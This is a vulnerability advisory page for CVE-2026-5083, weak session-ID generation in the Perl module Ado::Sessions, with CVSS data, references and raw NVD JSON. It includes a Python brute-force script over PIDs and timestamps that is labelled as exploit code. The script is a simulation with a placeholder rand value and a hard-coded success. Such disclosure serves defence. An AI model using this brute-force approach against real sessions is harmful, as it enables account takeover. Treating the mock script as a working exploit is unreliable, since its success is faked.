CVE-2026-5083

Description

Ado::Sessions versions through 0.935 for Perl generates insecure session ids. The session id is generated from a SHA-1 hash seeded with the built-in rand function, the epoch time, and the PID. The PID will come from a small set of numbers, and the epoch time may be guessed, if it is not leaked from the HTTP Date header. The built-in rand function is unsuitable for cryptographic usage. Predicable session ids could allow an attacker to gain access to systems. Note that Ado is no longer maintained, and has been removed from the CPAN index. It is still available on BackPAN.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:berov:ado\:\:sessions:*:*:*:*:*:perl:*:* - VULNERABLE

Ado::Sessions <= 0.935

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# PoC for CVE-2026-5083: Predictable Session ID in Ado::Sessions
# This script demonstrates the logic to guess session IDs based on weak entropy.

import hashlib
import time


def simulate_ado_session_id(epoch_time, pid, rand_seed):
    """
    Simulates the weak session ID generation logic of Ado::Sessions.
    Real implementation depends on Perl's rand() state, which is predictable.
    """
    # Concatenating weak entropy sources as described in the vulnerability
    entropy_source = f"{rand_seed}{epoch_time}{pid}"
    return hashlib.sha1(entropy_source.encode('utf-8')).hexdigest()


def attack_simulation(target_time, known_pid_range=(1, 5000)):
    """
    Simulates an attacker trying to guess a valid session ID
    by iterating over PIDs and a small time window.
    """
    print(f"[*] Starting attack simulation for time: {target_time}")
    print(f"[*] Brute forcing PID range: {known_pid_range}")
    
    # Assume attacker guesses the rand state or observes a pattern
    # Here we use a placeholder for the predictable rand output
    predictable_rand_val = 12345 

    for pid in range(known_pid_range[0], known_pid_range[1]):
        # Check a small window around the guessed time (e.g. +/- 5 seconds)
        for t in range(target_time - 5, target_time + 5):
            predicted_id = simulate_ado_session_id(t, pid, predictable_rand_val)
            # In a real scenario, the attacker would check if this ID exists/is valid
            print(f"Testing PID: {pid}, Time: {t} -> SessionID: {predicted_id}")
            
            # Mock success condition for demonstration
            if pid == 2500 and t == target_time:
                print(f"[+] Successfully predicted session ID: {predicted_id}")
                return predicted_id
    return None


if __name__ == "__main__":
    current_epoch = int(time.time())
    attack_simulation(current_epoch)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5083
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5083
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5083/
[4] VulDB https://vuldb.com/cve/CVE-2026-5083
[5] https://backpan.perl.org/authors/id/B/BE/BEROV/Ado-0.935.tar.gz
[6] https://github.com/kberov/Ado/issues/112
[7] https://security.metacpan.org/docs/guides/random-data-for-security.html
[8] http://www.openwall.com/lists/oss-security/2026/04/08/7

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5083", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-04-08T06:16:29.163", "lastModified": "2026-04-23T15:04:27.973", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ado::Sessions versions through 0.935 for Perl generates insecure session ids.\n\nThe session id is generated from a SHA-1 hash seeded with the built-in rand function, the epoch time, and the PID. The PID will come from a small set of numbers, and the epoch time may be guessed, if it is not leaked from the HTTP Date header. The built-in rand function is unsuitable for cryptographic usage.\n\nPredicable session ids could allow an attacker to gain access to systems.\n\nNote that Ado is no longer maintained, and has been removed from the CPAN index. It is still available on BackPAN."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-338"}, {"lang": "en", "value": "CWE-340"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:berov:ado\\:\\:sessions:*:*:*:*:*:perl:*:*", "versionEndIncluding": "0.935", "matchCriteriaId": "1DF482FB-2415-4BAE-B16A-99EA9F0CD85B"}]}]}], "references": [{"url": "https://backpan.perl.org/authors/id/B/BE/BEROV/Ado-0.935.tar.gz", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Product"]}, {"url": "https://github.com/kberov/Ado/issues/112", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Issue Tracking"]}, {"url": "https://security.metacpan.org/docs/guides/random-data-for-security.html", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Third Party Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/08/7", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}]}}